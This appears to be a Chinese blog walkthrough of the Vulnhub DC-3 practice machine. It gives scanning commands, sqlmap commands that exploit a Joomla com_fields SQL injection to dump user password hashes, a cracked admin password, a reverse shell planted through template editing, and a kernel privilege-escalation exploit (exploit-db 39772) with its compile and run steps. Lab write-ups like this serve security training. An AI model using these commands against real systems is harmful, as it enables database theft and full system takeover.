靶机 DC-3

最新推荐文章于 2024-06-04 22:11:38 发布
最新推荐文章于 2024-06-04 22:11:38 发布
阅读量257 收藏 1
点赞数 3
分类专栏: DC系列靶场 文章标签: centos linux bash
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_66299232/article/details/126873625
版权

环境准备

DC-3靶机链接:百度网盘 请输入提取码

提取码:pz03

虚拟主机网络连接模式:桥接模式

攻击机系统:Kali Linux2021.1

信息收集

1:使用以命令进行主机探测

ar-scan -l

2:对其主机进行详细的扫描发现只开放了80端口

nmap -sC -sV -p 1-65535 192.168.166.132

3:这里使用Joomscan扫描器来进行敏感信息收集

项目地址:https://github.com/OWASP/joomscan

直接用命令:git clone https://github.com/rezasp/joomscan.git

使用命令:joomscan --url http://192.168.166.132

4:发现Joomla版本号与后台管理地址,使用searchsploit查看是否有可以使用的EXP

5:可以看到有一个SQL注入漏洞,并使用以下命令查看详细信息

searchsploit -x php/webapps/42033.txt

漏洞利用

1:根据以上提示可以对其进行SQL注入

sqlmap -u "http://localhost/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml" --risk=3 --level=5 --random-agent --dbs -p list[fullordering]

sqlmap -u "http://localhost/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml" --risk=3 --level=5 --random-agent  -p list[fullordering] ‐D joomladb ‐T "#__users" ‐C "username,password" ‐‐dump

2:使用john对其HASH进行破解

3:得出admin账户密码 扫描出来的登录界面

4:登录http://192.168.166.132/administrator/

用户名:admin 密码:snoopy

5:按照图片指示操作

:

6:并通过编辑模板来获取shell,写php-reverse-shell.php木马 (百度即可获得)

权限提升

1: kali开启监听 ,拼接路径触发木马来反弹shell,查了一通,并没 有价值信息。

2:这次查看系统版本,看有没有内核漏洞

cat /etc/*release

3:使用searchsploit搜索主机Ubuntu 16.04  有关提权漏洞

4:找到一个39772.txt ,查看他的位置

5:cat /usr/share/exploitdb/exploits/linux/local/39772.txt 用cat命令查看后,这边提供了操作方法还有利用工具的下载方法(一时感叹kali真屌!!)

6: 把靶机目录切换到/tmp目录下,进行下载39772.zip

7::再次我们使用39772进行提权,用unzip 解压39772.zip , 打开后发现俩个文件

tar -xvf exploit.tar //解压

./compile.sh

./doubleput

按照第五步的截图做就OK ,最后也是轻松拿下!!!

魏钦6666
关注
  • 3
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
DC-3 靶机
weixin_63492470的博客
03-11 5397
DC-3 DC-3 | Five86 | DC Challenges (靶机下载地址) 环境:DC-3靶机地址:192.168.1.152 kali地址:192.168.1.176 都是桥接模式 1 .收集信息 nmap -sP 192.168.1.0/24 nmap -A 192.168.1.152 #发现joomla内容管理系统 访问 192.168.1.152 #发现 提示只有一个入口,让我们提权为root用户 知道网站用的是joomla cms,那我们就可以使用
Vulnhub靶机渗透测试 DC-1靶机
03-05
Vulnhub靶机渗透测试 DC-1靶机
DC-3靶机渗透测试详细教程
啊醒的博客
05-04 1979
DC-3靶机渗透测试详细教程
vulnhub靶机实战DC-3
最新发布
Varin
06-04 880
vulnhub靶机实战DC-3
DC-3靶场搭建及渗透实战详细过程(DC靶场系列)
金 帛的博客
07-27 5210
DC-3靶场渗透过程
靶机4 DC-3(过程超详细)
honest_gg的博客
09-26 1017
DC靶场一共有9个,对于学习渗透测试人员,有很大的帮助,是非常不错的靶场。
靶机DC-3—WP
m0_66638011的博客
05-17 1188
DC系列靶机是一系列专门为渗透测试和网络安全实验室设计的虚拟机器。这些靶机提供了一系列不同的漏洞和攻击场景,使渗透测试者可以在这些环境下测试自的技能和工具。DC系列靶机包含多个不同的主题,例如各种操作系统的漏洞,Web应用程序安全和无线网络安全等。它们对初学者和专业人士都有很大的价值,因为它们可以帮助他们了解安全漏洞和如何利用它们进行渗透测试。
Vulnhub靶机渗透测试 DC-3靶机
12-07
Vulnhub靶机渗透测试 DC-3靶机
Vulnhub靶机渗透测试 DC-8靶机
12-07
Vulnhub靶机渗透测试 DC-8靶机
Vulnhub靶机渗透测试 DC-7靶机
12-07
Vulnhub靶机渗透测试 DC-7靶机
Vulnhub靶机渗透测试 DC-9靶机
12-07
Vulnhub靶机渗透测试 DC-9靶机
vulnhub通关-3 DC-3(含靶场资源)
Brucye
02-07 926
6.网络设置,要与攻击机kali在同一网段,要么都用NAT模式,要么都用桥接模式(我这里用是是NAT模式)链接:https://pan.baidu.com/s/1tJr7V5ZbYMtfCLeOa40r2Q。建议不要使用https源,https更换源需要处理安全问题较为麻烦,我这里直接使用的http源。注意:doublepu.c执行后会生成doublepu 要再次执行doublepu。这款工具是专门对Joomla框架进行扫描的,需要进行下载。3.接下来选择你想导入的路径,进行导入即可。
Vulnhub靶机渗透测试——DC-3
Cobra的博客
04-26 3374
一、实验环境 攻击机(kali): 192.168.189.148 靶机(ubuntu16.04): 192.168.189.182 靶机下载地址:DC: 3.2 ~ VulnHub 二、信息收集 1、使用nmap扫描存活主机 2、发现IP192.168.189.182开放80端口,再对其进行nmap扫描 nmap -sV -A -T4 192.168.189.182 3、通过扫描结果我们发现其指纹信息为joomla,访问其80端口 4、使用dirsearch对其进行目.
Vulnhub渗透靶机系列----DC3
m0_67284865的博客
08-17 108
vulnhub详细步骤解析,Vulnhub渗透靶机系列----DC3
Vulnhub靶场渗透测试系列DC-3(Joomla CMS漏洞和Ubuntu16.04漏洞)
qq_45722813的博客
12-07 2973
Vulnhub靶场渗透测试DC-3 靶机下载地址:https://www.five86.com/dc-3.html 攻击机为kali2021,IP地址:192.168.172.131 将靶机导入到VMware,设置网络模式为NAT模式,开启靶机虚拟机 在kali攻击机使用nmap进行存活主机发现来获取靶机IP地址,命令nmap -T4 -Pn 192.168.172.1/24 但是发现没有扫描到靶机IP,可能是靶机网络设置问题,参考文章:https://editor.csdn.net/md/?artic
OWASP_VM_1.2靶机下载与安装
热门推荐
冠霖L的博客
07-04 3万+
OWASP(Broken Web Applications Project),是一组易受攻击的Open Web应用程序安全项目,分布在VMware格式的虚拟机上,包含了当前几乎全部类型的漏洞,例如:SQL注入、XSS攻击等等。它是由一家非营利性组织——OWASP 基金会提供持续性支持,可免费下载与使用。 OWASP官网:https://www.owasp.org OWASP中国官网:http:...
DC3-靶机
Au
08-22 4106
下载地址 这块填一下坑,上面那个链接有两个下载地址,本人是使用VMware虚拟机,下了第一个ova的导入,使用nmap扫,怎么也扫不到存活主机,一直以为是我本地环境的问题,最后没招了,准备重新下一个试试,然后到下载页面一看,作者已经被反馈过这个问题了,又做了一个新的VMware镜像,可以直接使用。 坑啊! 所以使用VMware的同学,下载第二个即可。 配置的环境: kali : 192.16...
内网渗透DC-3靶场通关
qq_35664104的博客
09-23 868
个人博客:点我 DC系列共9个靶场,本次来试玩一下DC-3,只有1个flag,下载地址。 下载下来后是 .ova 格式,建议使用vitualbox进行搭建,vmware可能存在兼容性问题。靶场推荐使用NAT(共享)模式,桥接模式可能会造成目标过多不易识别。 IP kali : 192.168.31.17 win7 : 192.168.31.168 dc-3 : 192.168.31.241 渗透 传统艺能端口扫描 nmap -sV -A -p- 192.168.31.241 cmd为joomla的,
渗透DC-1靶机设计思路
05-24
3. 扫描漏洞:使用漏洞扫描工具如Nessus、OpenVAS等扫描DC-1,寻找漏洞。 4. 渗透攻击:根据扫描结果,利用漏洞进行攻击。可以使用一些常见的攻击手段,如SQL注入、XSS、文件包含、远程代码执行等。 5. 提升权限:...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值